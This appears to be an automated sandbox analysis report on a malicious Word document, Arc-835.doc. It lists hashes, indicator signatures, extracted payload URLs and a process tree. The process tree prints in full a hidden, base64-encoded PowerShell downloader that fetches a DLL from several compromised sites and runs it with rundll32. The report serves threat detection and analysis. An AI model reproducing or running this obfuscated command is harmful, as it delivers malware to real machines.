Analysis
-
max time kernel
137s -
max time network
144s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
14-01-2021 10:06
Behavioral task
behavioral1
Sample
Arc-835.doc
Resource
win7v20201028
Behavioral task
behavioral2
Sample
Arc-835.doc
Resource
win10v20201028
General
-
Target
Arc-835.doc
-
Size
162KB
-
MD5
0fcd9569ef0690d4931268b090b913c1
-
SHA1
b7944313d64fd0f548c16a40da2fb485c376e359
-
SHA256
043eee7522492a5e9e3026f7afb191926db12ac96ee20475ebdc26eab2993095
-
SHA512
8338e42782c49c024f34b7fc2b2a6ea8f6094ca5cfd115af38ca4d7b9e2863f128b27370201fddd58901adbdf4c54a148cb2533780da1aa467cf9a7a9a10518e
Malware Config
Extracted
http://www.mitraship.com/wp-content/ZKeB/
http://djsrecord.com/wp-includes/abop/
https://lastfrontierstrekking.com/new/2OaabFU/
https://watchnshirt.com/y/L7z9YcA/
https://www.impipower.com/wp-content/U/
https://www.inkayniperutours.com/druver/LtcG/
https://vysimopoulos.com/d/NF/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3892 4360 cmd.exe -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exerundll32.exeflow pid process 14 3904 powershell.exe 29 2532 rundll32.exe -
Loads dropped DLL 1 IoCs
Processes:
rundll32.exepid process 388 rundll32.exe -
Drops file in System32 directory 1 IoCs
Processes:
rundll32.exedescription ioc process File opened for modification C:\Windows\SysWOW64\Uvbzzwuiip\pdcpvreua.ijz rundll32.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 4764 WINWORD.EXE 4764 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
powershell.exerundll32.exepid process 3904 powershell.exe 3904 powershell.exe 3904 powershell.exe 2532 rundll32.exe 2532 rundll32.exe 2532 rundll32.exe 2532 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 3904 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 4764 WINWORD.EXE 4764 WINWORD.EXE 4764 WINWORD.EXE 4764 WINWORD.EXE 4764 WINWORD.EXE 4764 WINWORD.EXE 4764 WINWORD.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
cmd.exepowershell.exerundll32.exerundll32.exedescription pid process target process PID 3892 wrote to memory of 4248 3892 cmd.exe msg.exe PID 3892 wrote to memory of 4248 3892 cmd.exe msg.exe PID 3892 wrote to memory of 3904 3892 cmd.exe powershell.exe PID 3892 wrote to memory of 3904 3892 cmd.exe powershell.exe PID 3904 wrote to memory of 976 3904 powershell.exe rundll32.exe PID 3904 wrote to memory of 976 3904 powershell.exe rundll32.exe PID 976 wrote to memory of 388 976 rundll32.exe rundll32.exe PID 976 wrote to memory of 388 976 rundll32.exe rundll32.exe PID 976 wrote to memory of 388 976 rundll32.exe rundll32.exe PID 388 wrote to memory of 2532 388 rundll32.exe rundll32.exe PID 388 wrote to memory of 2532 388 rundll32.exe rundll32.exe PID 388 wrote to memory of 2532 388 rundll32.exe rundll32.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Arc-835.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.execmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IAAgAFMARQB0ACAAKAAiAHgAawAiACsAIgBxAG0AIgApACAAKAAgACAAWwB0AFkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsAMgB9AHsAMwB9ACIALQBGACcAWQAnACwAJwBzACcALAAnAFMAVABFAG0ALgBpAG8ALgAnACwAJwBkAEkAcgBFAGMAVABPAHIAWQAnACkAIAAgACkAOwAgACAAIAAgAFMAZQBUAC0AVgBhAHIASQBhAGIAbABFACAAIABFADMAagB2AEEATQAgACgAIABbAFQAWQBQAEUAXQAoACIAewAxAH0AewAzAH0AewAwAH0AewA1AH0AewAyAH0AewA0AH0AIgAgAC0ARgAnAEUAcABvAGkAbgBUACcALAAnAHMAeQBzAFQAZQBNAC4AbgBlAFQALgBTAEUAcgB2AGkAJwAsACcAZQAnACwAJwBDACcALAAnAFIAJwAsACcAbQBBAE4AYQBHACcAKQAgACkAIAAgADsAIAAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACgAKAAnAFMAaQAnACsAJwBsAGUAJwApACsAJwBuACcAKwAoACcAdABsAHkAQwAnACsAJwBvACcAKQArACcAbgB0ACcAKwAoACcAaQAnACsAJwBuAHUAJwApACsAJwBlACcAKQA7ACQAUQB6AGgAeABoADMAMAA9ACQASAAwADIAVgAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUgA4ADYATwA7ACQAQwAxADkATwA9ACgAJwBaACcAKwAoACcAMAAnACsAJwBfAE8AJwApACkAOwAgACgAIAAgAEcARQB0AC0AVgBhAHIASQBBAEIATABlACAAIAAoACIAeABLACIAKwAiAFEATQAiACkAIAAtAFYAYQBMACkAOgA6ACIAQwBSAGAAZQBgAEEAVABgAGUARABJAFIAZQBDAHQAYABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9ACcAKwAnAE4AeQBwADIAYgB2AGkAewAwAH0ATQA1ACcAKwAnAHIAZwAnACsAKAAnAHYANQAnACsAJwBuACcAKQArACcAewAwAH0AJwApACAAIAAtAEYAWwBjAEgAYQByAF0AOQAyACkAKQA7ACQASgA2ADIAUQA9ACgAJwBVACcAKwAoACcANwA0ACcAKwAnAFgAJwApACkAOwAgACgAIABHAGUAVAAtAFYAYQBSAGkAYQBCAEwARQAgAEUAMwBqAFYAYQBNACAAIAAtAHYAQQBsACAAKQA6ADoAIgBTAEUAYwB1AFIAaQBgAFQAYABZAHAAcgBgAG8AYABUAG8AQwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAxACcAKQArACcAMgAnACkAOwAkAFEAOQA0AFIAPQAoACgAJwBIADcAJwArACcAMgAnACkAKwAnAE4AJwApADsAJABGAGkAbwBjAGQAbgBhACAAPQAgACgAKAAnAFoAJwArACcAXwAzACcAKQArACcAVgAnACkAOwAkAEUAMABfAFAAPQAoACgAJwBIACcAKwAnADcAMwAnACkAKwAnAEgAJwApADsAJABVADUAdQBjADIANABqAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACcATgB5AHAAMgBiAHYAaQB7ADAAfQBNADUAcgBnACcAKwAnAHYANQAnACsAJwBuACcAKwAnAHsAMAB9ACcAKQAtAGYAIABbAEMAaABhAFIAXQA5ADIAKQArACQARgBpAG8AYwBkAG4AYQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQAVAA5ADYAVgA9ACgAKAAnAEMANQAnACsAJwA3ACcAKQArACcAUwAnACkAOwAkAEkAdQBjAG0AZABxADIAPQAoACcAdwAnACsAKAAnAF0AeABtAFsAdgA6ACcAKwAnAC8AJwArACcALwAnACkAKwAoACcAdwAnACsAJwB3AHcAJwApACsAKAAnAC4AbQAnACsAJwBpAHQAJwArACcAcgAnACsAJwBhAHMAaABpAHAALgBjACcAKQArACgAJwBvAG0ALwAnACsAJwB3ACcAKQArACgAJwBwACcAKwAnAC0AYwBvACcAKwAnAG4AdAAnACsAJwBlAG4AdAAvAFoASwBlAEIAJwArACcALwAnACkAKwAnAEAAJwArACgAJwB3AF0AJwArACcAeAAnACkAKwAoACcAbQBbAHYAOgAvAC8AJwArACcAZAAnACsAJwBqAHMAcgAnACkAKwAoACcAZQBjACcAKwAnAG8AcgAnACkAKwAoACcAZAAuAGMAJwArACcAbwBtACcAKwAnAC8AdwBwACcAKwAnAC0AaQBuAGMAbAB1ACcAKQArACgAJwBkAGUAJwArACcAcwAnACkAKwAoACcALwBhAGIAJwArACcAbwBwAC8AJwApACsAJwBAAHcAJwArACgAJwBdAHgAJwArACcAbQBbAHYAJwApACsAJwBzACcAKwAoACcAOgAnACsAJwAvAC8AbAAnACkAKwAoACcAYQBzACcAKwAnAHQAZgAnACsAJwByAG8AbgAnACkAKwAoACcAdABpAGUAJwArACcAcgAnACkAKwAnAHMAJwArACgAJwB0AHIAJwArACcAZQBrAGsAJwApACsAKAAnAGkAbgAnACsAJwBnACcAKQArACgAJwAuAGMAJwArACcAbwBtACcAKQArACgAJwAvACcAKwAnAG4AZQB3AC8AMgBPAGEAJwArACcAYQAnACkAKwAoACcAYgBGAFUAJwArACcALwBAAHcAXQB4ACcAKQArACgAJwBtAFsAdgBzADoALwAvAHcAYQB0AGMAJwArACcAaABuAHMAJwArACcAaABpACcAKwAnAHIAJwArACcAdAAuAGMAbwBtAC8AeQAnACsAJwAvACcAKwAnAEwANwB6ADkAWQBjACcAKwAnAEEALwBAACcAKwAnAHcAXQB4ACcAKwAnAG0AJwApACsAKAAnAFsAdgAnACsAJwBzADoALwAnACkAKwAnAC8AdwAnACsAKAAnAHcAdwAnACsAJwAuAGkAJwApACsAKAAnAG0AcAAnACsAJwBpAHAAJwArACcAbwAnACsAJwB3ACcAKwAnAGUAcgAuAGMAbwBtAC8AdwBwAC0AJwApACsAJwBjACcAKwAnAG8AJwArACgAJwBuAHQAZQBuAHQAJwArACcALwBVACcAKQArACcALwBAACcAKwAoACcAdwBdAHgAbQBbAHYAJwArACcAcwA6ACcAKwAnAC8AJwApACsAKAAnAC8AJwArACcAdwB3AHcALgAnACsAJwBpACcAKQArACcAbgAnACsAKAAnAGsAJwArACcAYQB5AG4AaQAnACkAKwAoACcAcABlAHIAdQB0ACcAKwAnAG8AJwArACcAdQByAHMALgBjAG8AJwArACcAbQAvAGQAJwApACsAKAAnAHIAJwArACcAdQB2AGUAJwArACcAcgAvACcAKwAnAEwAdABjAEcAJwApACsAKAAnAC8AQAB3ACcAKwAnAF0AeAAnACsAJwBtAFsAJwApACsAKAAnAHYAJwArACcAcwA6ACcAKQArACgAJwAvAC8AdgB5ACcAKwAnAHMAaQAnACkAKwAoACcAbQBvAHAAJwArACcAbwB1AGwAJwArACcAbwBzAC4AYwAnACkAKwAoACcAbwBtACcAKwAnAC8AZAAvAE4AJwArACcARgAvACcAKQApAC4AIgBSAGAAZQBQAEwAYABBAEMAZQAiACgAKAAnAHcAXQAnACsAKAAnAHgAbQAnACsAJwBbACcAKQArACcAdgAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAoACcAaAAnACsAJwB0AHQAJwApACsAJwBwACcAKQAsACcAMwBkACcAKQBbADEAXQApAC4AIgBTAFAAYABsAEkAdAAiACgAJABIADkAMgBHACAAKwAgACQAUQB6AGgAeABoADMAMAAgACsAIAAkAEoAOQA1AFMAKQA7ACQATAA0ADQARQA9ACgAJwBZADgAJwArACcAOABLACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAVwB1AHEAMgAyAF8AaAAgAGkAbgAgACQASQB1AGMAbQBkAHEAMgApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3ACcAKwAnAC0ATwBiAGoAZQBjACcAKwAnAHQAJwApACAAUwBZAHMAdABFAG0ALgBuAGUAVAAuAHcARQBCAGMATABpAGUAbgBUACkALgAiAGQATwB3AE4AbABgAG8AYABBAGQARgBgAGkAbABlACIAKAAkAFcAdQBxADIAMgBfAGgALAAgACQAVQA1AHUAYwAyADQAagApADsAJABBADcAMQBOAD0AKAAoACcATwAnACsAJwAyADQAJwApACsAJwBGACcAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtACcAKwAnAEkAdAAnACsAJwBlAG0AJwApACAAJABVADUAdQBjADIANABqACkALgAiAEwARQBOAGAAZwB0AGgAIgAgAC0AZwBlACAANAA1ADEANAA5ACkAIAB7AC4AKAAnAHIAdQBuAGQAbAAnACsAJwBsADMAMgAnACkAIAAkAFUANQB1AGMAMgA0AGoALAAoACgAJwBTAGgAbwAnACsAJwB3ACcAKQArACgAJwBEAGkAJwArACcAYQAnACkAKwAoACcAbABvACcAKwAnAGcAQQAnACkAKQAuACIAVABPAGAAUwB0AHIAaQBOAEcAIgAoACkAOwAkAEkANgAzAEUAPQAoACgAJwBTACcAKwAnADgAOAAnACkAKwAnAEMAJwApADsAYgByAGUAYQBrADsAJABFADcAMgBTAD0AKAAnAEsANAAnACsAJwBfAEkAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABTADMAMwBPAD0AKAAoACcAVAAnACsAJwA3ADgAJwApACsAJwBKACcAKQA=1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\msg.exemsg Admin /v Word experienced an error trying to open the file.2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePOwersheLL -w hidden -ENCOD IAAgAFMARQB0ACAAKAAiAHgAawAiACsAIgBxAG0AIgApACAAKAAgACAAWwB0AFkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsAMgB9AHsAMwB9ACIALQBGACcAWQAnACwAJwBzACcALAAnAFMAVABFAG0ALgBpAG8ALgAnACwAJwBkAEkAcgBFAGMAVABPAHIAWQAnACkAIAAgACkAOwAgACAAIAAgAFMAZQBUAC0AVgBhAHIASQBhAGIAbABFACAAIABFADMAagB2AEEATQAgACgAIABbAFQAWQBQAEUAXQAoACIAewAxAH0AewAzAH0AewAwAH0AewA1AH0AewAyAH0AewA0AH0AIgAgAC0ARgAnAEUAcABvAGkAbgBUACcALAAnAHMAeQBzAFQAZQBNAC4AbgBlAFQALgBTAEUAcgB2AGkAJwAsACcAZQAnACwAJwBDACcALAAnAFIAJwAsACcAbQBBAE4AYQBHACcAKQAgACkAIAAgADsAIAAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACgAKAAnAFMAaQAnACsAJwBsAGUAJwApACsAJwBuACcAKwAoACcAdABsAHkAQwAnACsAJwBvACcAKQArACcAbgB0ACcAKwAoACcAaQAnACsAJwBuAHUAJwApACsAJwBlACcAKQA7ACQAUQB6AGgAeABoADMAMAA9ACQASAAwADIAVgAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUgA4ADYATwA7ACQAQwAxADkATwA9ACgAJwBaACcAKwAoACcAMAAnACsAJwBfAE8AJwApACkAOwAgACgAIAAgAEcARQB0AC0AVgBhAHIASQBBAEIATABlACAAIAAoACIAeABLACIAKwAiAFEATQAiACkAIAAtAFYAYQBMACkAOgA6ACIAQwBSAGAAZQBgAEEAVABgAGUARABJAFIAZQBDAHQAYABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9ACcAKwAnAE4AeQBwADIAYgB2AGkAewAwAH0ATQA1ACcAKwAnAHIAZwAnACsAKAAnAHYANQAnACsAJwBuACcAKQArACcAewAwAH0AJwApACAAIAAtAEYAWwBjAEgAYQByAF0AOQAyACkAKQA7ACQASgA2ADIAUQA9ACgAJwBVACcAKwAoACcANwA0ACcAKwAnAFgAJwApACkAOwAgACgAIABHAGUAVAAtAFYAYQBSAGkAYQBCAEwARQAgAEUAMwBqAFYAYQBNACAAIAAtAHYAQQBsACAAKQA6ADoAIgBTAEUAYwB1AFIAaQBgAFQAYABZAHAAcgBgAG8AYABUAG8AQwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAxACcAKQArACcAMgAnACkAOwAkAFEAOQA0AFIAPQAoACgAJwBIADcAJwArACcAMgAnACkAKwAnAE4AJwApADsAJABGAGkAbwBjAGQAbgBhACAAPQAgACgAKAAnAFoAJwArACcAXwAzACcAKQArACcAVgAnACkAOwAkAEUAMABfAFAAPQAoACgAJwBIACcAKwAnADcAMwAnACkAKwAnAEgAJwApADsAJABVADUAdQBjADIANABqAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACcATgB5AHAAMgBiAHYAaQB7ADAAfQBNADUAcgBnACcAKwAnAHYANQAnACsAJwBuACcAKwAnAHsAMAB9ACcAKQAtAGYAIABbAEMAaABhAFIAXQA5ADIAKQArACQARgBpAG8AYwBkAG4AYQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQAVAA5ADYAVgA9ACgAKAAnAEMANQAnACsAJwA3ACcAKQArACcAUwAnACkAOwAkAEkAdQBjAG0AZABxADIAPQAoACcAdwAnACsAKAAnAF0AeABtAFsAdgA6ACcAKwAnAC8AJwArACcALwAnACkAKwAoACcAdwAnACsAJwB3AHcAJwApACsAKAAnAC4AbQAnACsAJwBpAHQAJwArACcAcgAnACsAJwBhAHMAaABpAHAALgBjACcAKQArACgAJwBvAG0ALwAnACsAJwB3ACcAKQArACgAJwBwACcAKwAnAC0AYwBvACcAKwAnAG4AdAAnACsAJwBlAG4AdAAvAFoASwBlAEIAJwArACcALwAnACkAKwAnAEAAJwArACgAJwB3AF0AJwArACcAeAAnACkAKwAoACcAbQBbAHYAOgAvAC8AJwArACcAZAAnACsAJwBqAHMAcgAnACkAKwAoACcAZQBjACcAKwAnAG8AcgAnACkAKwAoACcAZAAuAGMAJwArACcAbwBtACcAKwAnAC8AdwBwACcAKwAnAC0AaQBuAGMAbAB1ACcAKQArACgAJwBkAGUAJwArACcAcwAnACkAKwAoACcALwBhAGIAJwArACcAbwBwAC8AJwApACsAJwBAAHcAJwArACgAJwBdAHgAJwArACcAbQBbAHYAJwApACsAJwBzACcAKwAoACcAOgAnACsAJwAvAC8AbAAnACkAKwAoACcAYQBzACcAKwAnAHQAZgAnACsAJwByAG8AbgAnACkAKwAoACcAdABpAGUAJwArACcAcgAnACkAKwAnAHMAJwArACgAJwB0AHIAJwArACcAZQBrAGsAJwApACsAKAAnAGkAbgAnACsAJwBnACcAKQArACgAJwAuAGMAJwArACcAbwBtACcAKQArACgAJwAvACcAKwAnAG4AZQB3AC8AMgBPAGEAJwArACcAYQAnACkAKwAoACcAYgBGAFUAJwArACcALwBAAHcAXQB4ACcAKQArACgAJwBtAFsAdgBzADoALwAvAHcAYQB0AGMAJwArACcAaABuAHMAJwArACcAaABpACcAKwAnAHIAJwArACcAdAAuAGMAbwBtAC8AeQAnACsAJwAvACcAKwAnAEwANwB6ADkAWQBjACcAKwAnAEEALwBAACcAKwAnAHcAXQB4ACcAKwAnAG0AJwApACsAKAAnAFsAdgAnACsAJwBzADoALwAnACkAKwAnAC8AdwAnACsAKAAnAHcAdwAnACsAJwAuAGkAJwApACsAKAAnAG0AcAAnACsAJwBpAHAAJwArACcAbwAnACsAJwB3ACcAKwAnAGUAcgAuAGMAbwBtAC8AdwBwAC0AJwApACsAJwBjACcAKwAnAG8AJwArACgAJwBuAHQAZQBuAHQAJwArACcALwBVACcAKQArACcALwBAACcAKwAoACcAdwBdAHgAbQBbAHYAJwArACcAcwA6ACcAKwAnAC8AJwApACsAKAAnAC8AJwArACcAdwB3AHcALgAnACsAJwBpACcAKQArACcAbgAnACsAKAAnAGsAJwArACcAYQB5AG4AaQAnACkAKwAoACcAcABlAHIAdQB0ACcAKwAnAG8AJwArACcAdQByAHMALgBjAG8AJwArACcAbQAvAGQAJwApACsAKAAnAHIAJwArACcAdQB2AGUAJwArACcAcgAvACcAKwAnAEwAdABjAEcAJwApACsAKAAnAC8AQAB3ACcAKwAnAF0AeAAnACsAJwBtAFsAJwApACsAKAAnAHYAJwArACcAcwA6ACcAKQArACgAJwAvAC8AdgB5ACcAKwAnAHMAaQAnACkAKwAoACcAbQBvAHAAJwArACcAbwB1AGwAJwArACcAbwBzAC4AYwAnACkAKwAoACcAbwBtACcAKwAnAC8AZAAvAE4AJwArACcARgAvACcAKQApAC4AIgBSAGAAZQBQAEwAYABBAEMAZQAiACgAKAAnAHcAXQAnACsAKAAnAHgAbQAnACsAJwBbACcAKQArACcAdgAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAoACcAaAAnACsAJwB0AHQAJwApACsAJwBwACcAKQAsACcAMwBkACcAKQBbADEAXQApAC4AIgBTAFAAYABsAEkAdAAiACgAJABIADkAMgBHACAAKwAgACQAUQB6AGgAeABoADMAMAAgACsAIAAkAEoAOQA1AFMAKQA7ACQATAA0ADQARQA9ACgAJwBZADgAJwArACcAOABLACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAVwB1AHEAMgAyAF8AaAAgAGkAbgAgACQASQB1AGMAbQBkAHEAMgApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3ACcAKwAnAC0ATwBiAGoAZQBjACcAKwAnAHQAJwApACAAUwBZAHMAdABFAG0ALgBuAGUAVAAuAHcARQBCAGMATABpAGUAbgBUACkALgAiAGQATwB3AE4AbABgAG8AYABBAGQARgBgAGkAbABlACIAKAAkAFcAdQBxADIAMgBfAGgALAAgACQAVQA1AHUAYwAyADQAagApADsAJABBADcAMQBOAD0AKAAoACcATwAnACsAJwAyADQAJwApACsAJwBGACcAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtACcAKwAnAEkAdAAnACsAJwBlAG0AJwApACAAJABVADUAdQBjADIANABqACkALgAiAEwARQBOAGAAZwB0AGgAIgAgAC0AZwBlACAANAA1ADEANAA5ACkAIAB7AC4AKAAnAHIAdQBuAGQAbAAnACsAJwBsADMAMgAnACkAIAAkAFUANQB1AGMAMgA0AGoALAAoACgAJwBTAGgAbwAnACsAJwB3ACcAKQArACgAJwBEAGkAJwArACcAYQAnACkAKwAoACcAbABvACcAKwAnAGcAQQAnACkAKQAuACIAVABPAGAAUwB0AHIAaQBOAEcAIgAoACkAOwAkAEkANgAzAEUAPQAoACgAJwBTACcAKwAnADgAOAAnACkAKwAnAEMAJwApADsAYgByAGUAYQBrADsAJABFADcAMgBTAD0AKAAnAEsANAAnACsAJwBfAEkAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABTADMAMwBPAD0AKAAoACcAVAAnACsAJwA3ADgAJwApACsAJwBKACcAKQA=2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\Nyp2bvi\M5rgv5n\Z_3V.dll,ShowDialogA3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\Nyp2bvi\M5rgv5n\Z_3V.dll,ShowDialogA4⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Uvbzzwuiip\pdcpvreua.ijz",ShowDialogA5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\Nyp2bvi\M5rgv5n\Z_3V.dllMD5
43f85170b4c974b94c108465ff52ba20
SHA1c1ef0c373c396000f8ef76a0f619b3872c30b4fc
SHA256461bfeb6067704d94e746a0e8e3b965410e9f89e0bc39d331460acf5d05e491f
SHA512610650e4891a94232136852041e52939e8e8aad2db0b4450321b8dae508c827ce24530d4e54702222a8cdca879abf1677eb42e15f4066babc2a9741e2be11cca
-
\Users\Admin\Nyp2bvi\M5rgv5n\Z_3V.dllMD5
43f85170b4c974b94c108465ff52ba20
SHA1c1ef0c373c396000f8ef76a0f619b3872c30b4fc
SHA256461bfeb6067704d94e746a0e8e3b965410e9f89e0bc39d331460acf5d05e491f
SHA512610650e4891a94232136852041e52939e8e8aad2db0b4450321b8dae508c827ce24530d4e54702222a8cdca879abf1677eb42e15f4066babc2a9741e2be11cca
-
memory/388-10-0x0000000000000000-mapping.dmp
-
memory/976-8-0x0000000000000000-mapping.dmp
-
memory/2532-12-0x0000000000000000-mapping.dmp
-
memory/3904-4-0x0000000000000000-mapping.dmp
-
memory/3904-5-0x00007FF934070000-0x00007FF934A5C000-memory.dmpFilesize
9.9MB
-
memory/3904-6-0x000001E63A050000-0x000001E63A051000-memory.dmpFilesize
4KB
-
memory/3904-7-0x000001E63A200000-0x000001E63A201000-memory.dmpFilesize
4KB
-
memory/4248-3-0x0000000000000000-mapping.dmp
-
memory/4764-2-0x00007FF942070000-0x00007FF9426A7000-memory.dmpFilesize
6.2MB